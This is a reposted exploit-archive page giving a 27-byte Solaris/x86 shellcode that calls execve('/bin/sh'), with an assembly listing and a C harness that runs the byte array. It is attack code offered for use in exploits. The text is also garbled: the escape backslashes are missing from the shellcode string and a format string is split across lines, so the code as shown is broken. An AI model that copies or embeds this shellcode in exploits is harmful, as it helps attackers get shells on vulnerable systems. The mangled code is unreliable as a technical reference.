Home / os / win7

solaris/x86 - execve("/bin/sh","/bin/sh"

Posted on 20 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>solaris/x86 - execve(&quot;/bin/sh&quot;,&quot;/bin/sh&quot;,NULL) - 27 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================
solaris/x86 - execve(&quot;/bin/sh&quot;,&quot;/bin/sh&quot;,NULL) - 27 bytes
=========================================================


/*
Title:   Solaris/x86 - execve(&quot;/bin/sh&quot;,&quot;/bin/sh&quot;,NULL) - 27 bytes
Author:  Jonathan Salwan &lt;submit AT shell-storm.org&gt;
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
 
Date:    2010-05-19
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris
 
section .text
    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              50                 pushl  %eax
    0x8048077:              68 6e 2f 73 68     pushl  $0x68732f6e
    0x804807c:              68 2f 2f 62 69     pushl  $0x69622f2f
    0x8048081:              89 e3              movl   %esp,%ebx
    0x8048083:              50                 pushl  %eax
    0x8048084:              53                 pushl  %ebx
    0x8048085:              89 e2              movl   %esp,%edx
    0x8048087:              50                 pushl  %eax
    0x8048088:              52                 pushl  %edx
    0x8048089:              53                 pushl  %ebx
    0x804808a:              b0 3b              movb   $0x3b,%al
    0x804808c:              50                 pushl  %eax
    0x804808d:              cd 91              int    $0x91
 
*/
 
 
#include &lt;stdio.h&gt;
 
char sc[] = &quot;x31xc0x50x68x6ex2f&quot;
        &quot;x73x68x68x2fx2fx62&quot;
        &quot;x69x89xe3x50x53x89&quot;
        &quot;xe2x50x52x53xb0x3b&quot;
        &quot;x50xcdx91&quot;;
 
int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(sc));
    (*(void(*)()) sc)();
 
return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :